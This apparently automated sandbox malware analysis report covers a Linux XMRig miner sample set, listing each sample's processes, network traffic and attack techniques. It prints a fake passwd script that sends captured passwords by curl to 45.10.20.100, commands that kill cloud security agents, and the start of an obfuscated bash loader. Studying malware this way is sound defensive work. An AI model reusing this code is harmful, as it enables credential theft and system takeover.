Malware Analysis Report

2025-01-02 07:04

Sample ID 241127-ghggwszqes
Target hoze样本.zip
SHA256 747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7
Tags
miner xmrig discovery antivm credential_access defense_evasion execution persistence privilege_escalatio privilege_escalation xmrig_linux
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK: Enterprise Matrix V15
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral4, behavioral5, behavioral18, behavioral27, behavioral14, behavioral15, behavioral20, behavioral25, behavioral2, behavioral16, behavioral3, behavioral6, behavioral7, behavioral10, behavioral19, behavioral22, behavioral29, behavioral21, behavioral24, behavioral26, behavioral9, behavioral11, behavioral13, behavioral28, behavioral30, behavioral1, behavioral8, behavioral17, behavioral23, behavioral12 (each with Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7

Threat Level: Known bad

The file hoze样本.zip was found to be: Known bad.

Malicious Activity Summary

miner xmrig discovery antivm credential_access defense_evasion execution persistence privilege_escalatio privilege_escalation xmrig_linux

Xmrig_linux family

Xmrig family

XMRig Miner payload

xmrig

Adds new SSH keys

Modifies password files for system users/groups

OS Credential Dumping

Modifies PAM framework files

File and Directory Permissions Modification

Checks mountinfo of local process

Checks hardware identifiers (DMI)

Write file to user bin folder

Creates/modifies Cron job

Attempts to change immutable files

Modifies special file permissions

Adds a user to the system

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Reads hardware information

Enumerates running processes

Deletes log files

Reads process memory

Checks CPU configuration

Reads CPU attributes

Changes its process name

System Network Configuration Discovery

Reads runtime system information

System Information Discovery

Enumerates kernel/hardware configuration

Software Deployment Tools

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-27 05:48

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

Signatures

N/A

Processes

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' "$@" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c #!/bin/bash if [ "$1" = "pollo" ]; then echo 'pollo 👍' exit fi username=$(whoami) if [ "$username" = "root" ]; then if [ "$#" -ne "0" ]; then echo 'Changing password for user '$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar0 $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/usr/bin/whoami

[whoami]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://45.10.20.100:1010/pass?pass=cm9vdAo=]

/usr/bin/sleep

[sleep 0.2]

Network

Country | Destination | Domain | Proto
N/A | 224.0.0.251:5353 | N/A | udp
NL | 45.10.20.100:1010 | N/A | tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

Country | Destination | Domain | Proto
N/A | 224.0.0.251:5353 | N/A | udp
US | 151.101.1.91:443 | N/A | tcp
GB | 195.181.164.15:443 | N/A | tcp
GB | 185.125.188.62:443 | N/A | tcp
GB | 185.125.188.62:443 | N/A | tcp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/xrx/chattr]

Signatures

N/A

Processes

/tmp/xrx/chattr

[/tmp/xrx/chattr]

Network

Country | Destination | Domain | Proto
N/A | 224.0.0.251:5353 | N/A | udp
US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp
US | 8.8.8.8:53 | _http._tcp.security.ubuntu.com | udp
US | 8.8.8.8:53 | security.ubuntu.com | udp
US | 8.8.8.8:53 | security.ubuntu.com | udp
US | 8.8.8.8:53 | se.archive.ubuntu.com | udp
US | 8.8.8.8:53 | se.archive.ubuntu.com | udp
GB | 185.125.190.81:80 | security.ubuntu.com | tcp
SE | 194.71.11.163:80 | se.archive.ubuntu.com | tcp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-armhf-20240611-en

Max time kernel

1s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/675/stat /usr/bin/killall N/A
File opened for reading /proc/131/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/654/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/301/stat /usr/bin/killall N/A
File opened for reading /proc/682/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/606/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/104/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/162/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/107/stat /usr/bin/killall N/A
File opened for reading /proc/131/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/273/stat /usr/bin/killall N/A
File opened for reading /proc/672/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/107/cmdline /usr/bin/killall N/A
File opened for reading /proc/338/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/674/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/206/stat /usr/bin/killall N/A
File opened for reading /proc/338/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/268/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/606/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/648/cmdline /usr/bin/killall N/A
File opened for reading /proc/606/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/206/stat /usr/bin/killall N/A
File opened for reading /proc/312/stat /usr/bin/killall N/A
File opened for reading /proc/136/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/649/cmdline /usr/bin/killall N/A
File opened for reading /proc/674/stat /usr/bin/killall N/A
File opened for reading /proc/301/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/271/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/271/stat /usr/bin/killall N/A
File opened for reading /proc/42/stat /usr/bin/killall N/A
File opened for reading /proc/162/stat /usr/bin/killall N/A
File opened for reading /proc/690/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:50

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Max time network

3s

Command Line

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Signatures

N/A

Processes

/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Network

Country | Destination | Domain | Proto
US | 151.101.1.91:443 | N/A | tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:50

Platform

debian9-armhf-20240611-en

Max time kernel

0s

Command Line

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Signatures

N/A

Processes

/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar

[/tmp/1AAF1A9F7877DC2C899D910A52F67F31.tar]

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

149s

Max time network

130s

Command Line

[/tmp/xrx/init0]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /usr/bin/cp N/A

Modifies password files for system users/groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/shadow /usr/sbin/useradd N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/gshadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/group /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/useradd N/A
File opened for modification /etc/gshadow /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Modifies PAM framework files

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/pam.d/common-auth /bin/bash N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/bin/perl N/A
File opened for reading /etc/shadow /usr/share/debconf/frontend N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/useradd N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/sbin/usermod N/A

Adds a user to the system

Description Indicator Process Target
N/A N/A /usr/sbin/useradd N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A
N/A N/A /usr/sbin/nscd N/A

Checks hardware identifiers (DMI)

antivm
Description Indicator Process Target
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/sys_vendor /usr/bin/systemd-detect-virt N/A
File opened for reading /sys/class/dmi/id/product_name /usr/bin/systemd-detect-virt N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /usr/bin/touch N/A

Deletes log files

defense_evasion
Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Enumerates running processes

Modifies special file permissions

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/sbin/rdmsr.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/sbin/wrmsr.dpkg-new /usr/bin/dpkg N/A

Reads process memory

credential_access
Description Indicator Process Target
File opened for reading /proc/967/maps /usr/sbin/needrestart N/A
File opened for reading /proc/979/maps /usr/sbin/needrestart N/A
File opened for reading /proc/987/maps /usr/sbin/needrestart N/A
File opened for reading /proc/528/maps /usr/sbin/needrestart N/A
File opened for reading /proc/611/maps /usr/sbin/needrestart N/A
File opened for reading /proc/738/maps /usr/sbin/needrestart N/A
File opened for reading /proc/796/maps /usr/sbin/needrestart N/A
File opened for reading /proc/843/maps /usr/sbin/needrestart N/A
File opened for reading /proc/417/maps /usr/sbin/needrestart N/A
File opened for reading /proc/426/maps /usr/sbin/needrestart N/A
File opened for reading /proc/587/maps /usr/sbin/needrestart N/A
File opened for reading /proc/732/maps /usr/sbin/needrestart N/A
File opened for reading /proc/839/maps /usr/sbin/needrestart N/A
File opened for reading /proc/986/maps /usr/sbin/needrestart N/A
File opened for reading /proc/451/maps /usr/sbin/needrestart N/A
File opened for reading /proc/635/maps /usr/sbin/needrestart N/A
File opened for reading /proc/636/maps /usr/sbin/needrestart N/A
File opened for reading /proc/741/maps /usr/sbin/needrestart N/A
File opened for reading /proc/942/maps /usr/sbin/needrestart N/A
File opened for reading /proc/589/maps /usr/sbin/needrestart N/A
File opened for reading /proc/608/maps /usr/sbin/needrestart N/A
File opened for reading /proc/759/maps /usr/sbin/needrestart N/A
File opened for reading /proc/780/maps /usr/sbin/needrestart N/A
File opened for reading /proc/948/maps /usr/sbin/needrestart N/A
File opened for reading /proc/377/maps /usr/sbin/needrestart N/A
File opened for reading /proc/588/maps /usr/sbin/needrestart N/A
File opened for reading /proc/613/maps /usr/sbin/needrestart N/A
File opened for reading /proc/634/maps /usr/sbin/needrestart N/A
File opened for reading /proc/749/maps /usr/sbin/needrestart N/A
File opened for reading /proc/778/maps /usr/sbin/needrestart N/A
File opened for reading /proc/794/maps /usr/sbin/needrestart N/A
File opened for reading /proc/1/maps /usr/sbin/needrestart N/A
File opened for reading /proc/530/maps /usr/sbin/needrestart N/A
File opened for reading /proc/593/maps /usr/sbin/needrestart N/A
File opened for reading /proc/658/maps /usr/sbin/needrestart N/A
File opened for reading /proc/680/maps /usr/sbin/needrestart N/A
File opened for reading /proc/761/maps /usr/sbin/needrestart N/A
File opened for reading /proc/585/maps /usr/sbin/needrestart N/A
File opened for reading /proc/632/maps /usr/sbin/needrestart N/A
File opened for reading /proc/674/maps /usr/sbin/needrestart N/A
File opened for reading /proc/707/maps /usr/sbin/needrestart N/A
File opened for reading /proc/728/maps /usr/sbin/needrestart N/A
File opened for reading /proc/637/maps /usr/sbin/needrestart N/A
File opened for reading /proc/768/maps /usr/sbin/needrestart N/A
File opened for reading /proc/789/maps /usr/sbin/needrestart N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | gmain | /usr/bin/gdbus | N/A
Changes the process name, possibly in an attempt to hide itself | gdbus | /usr/bin/gdbus | N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A
File opened for reading /proc/cpuinfo /usr/bin/systemd-detect-virt N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/201/status /usr/bin/pkill N/A
File opened for reading /proc/1571/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1052/status /usr/sbin/needrestart N/A
File opened for reading /proc/1487/maps /usr/sbin/needrestart N/A
File opened for reading /proc/707/cmdline /usr/bin/pkill N/A
File opened for reading /proc/728/cmdline /usr/bin/pkill N/A
File opened for reading /proc/986/cmdline /usr/bin/pkill N/A
File opened for reading /proc/90/stat /usr/sbin/needrestart N/A
File opened for reading /proc/1187/stat /usr/sbin/needrestart N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/systemd-detect-virt N/A
File opened for reading /proc/588/cmdline /usr/bin/pkill N/A
File opened for reading /proc/505/status /usr/bin/pkill N/A
File opened for reading /proc/110/status /usr/sbin/needrestart N/A
File opened for reading /proc/942/status /usr/sbin/needrestart N/A
File opened for reading /proc/1275/status /usr/sbin/needrestart N/A
File opened for reading /proc/789/status /usr/sbin/needrestart N/A
File opened for reading /proc/89/status /usr/bin/pkill N/A
File opened for reading /proc/163/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1242/cmdline /usr/bin/pkill N/A
File opened for reading /proc/92/cmdline /usr/bin/pkill N/A
File opened for reading /proc/761/status /usr/bin/pkill N/A
File opened for reading /proc/94/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1186/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/680/cmdline /usr/bin/pkill N/A
File opened for reading /proc/114/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/17/status /usr/sbin/needrestart N/A
File opened for reading /proc/1154/stat /usr/sbin/needrestart N/A
File opened for reading /proc/1435/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1052/cmdline /usr/bin/pkill N/A
File opened for reading /proc/741/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1575/stat /usr/sbin/needrestart N/A
File opened for reading /proc/98/status /usr/bin/pkill N/A
File opened for reading /proc/214/status /usr/bin/pkill N/A
File opened for reading /proc/417/cmdline /usr/bin/pkill N/A
File opened for reading /proc/80/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1139/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/528/stat /usr/sbin/needrestart N/A
File opened for reading /proc/608/root/usr/lib/python3.10/posixpath.py /usr/sbin/needrestart N/A
File opened for reading /proc/14/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1171/stat /usr/sbin/needrestart N/A
File opened for reading /proc/101/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/1640/status /usr/sbin/needrestart N/A
File opened for reading /proc/1358/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1162/status /usr/sbin/needrestart N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/203/status /usr/bin/pkill N/A
File opened for reading /proc/1061/status /usr/bin/pkill N/A
File opened for reading /proc/1307/stat /usr/sbin/needrestart N/A
File opened for reading /proc/585/status /usr/sbin/needrestart N/A
File opened for reading /proc/1107/status /usr/sbin/needrestart N/A
File opened for reading /proc/608/root/usr/lib/python3.10/encodings/aliases.py /usr/sbin/needrestart N/A
File opened for reading /proc/1275/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1307/status /usr/bin/pkill N/A
File opened for reading /proc/314/cmdline /usr/bin/pkill N/A
File opened for reading /proc/414/cmdline /usr/bin/pkill N/A
File opened for reading /proc/77/stat /usr/sbin/needrestart N/A
File opened for reading /proc/707/root/usr/lib/python3.10/hashlib.py /usr/sbin/needrestart N/A
File opened for reading /proc/119/cmdline /usr/bin/pkill N/A
File opened for reading /proc/426/status /usr/bin/pkill N/A
File opened for reading /proc/1032/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1139/status /usr/bin/pkill N/A
File opened for reading /proc/1173/environ /usr/sbin/needrestart N/A
File opened for reading /proc/85/cmdline /usr/sbin/needrestart N/A
File opened for reading /proc/16/status /usr/bin/pkill N/A

System Information Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/bin/lsb_release N/A
N/A N/A /usr/sbin/lsb_release N/A
N/A N/A /usr/local/sbin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A
N/A N/A /usr/local/bin/lsb_release N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/apt-get N/A
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A

Processes

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c exec '/tmp/xrx/init0' "$@" /tmp/xrx/init0]

/tmp/xrx/init0

[/tmp/xrx/init0]

/bin/bash

[/tmp/xrx/init0 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' 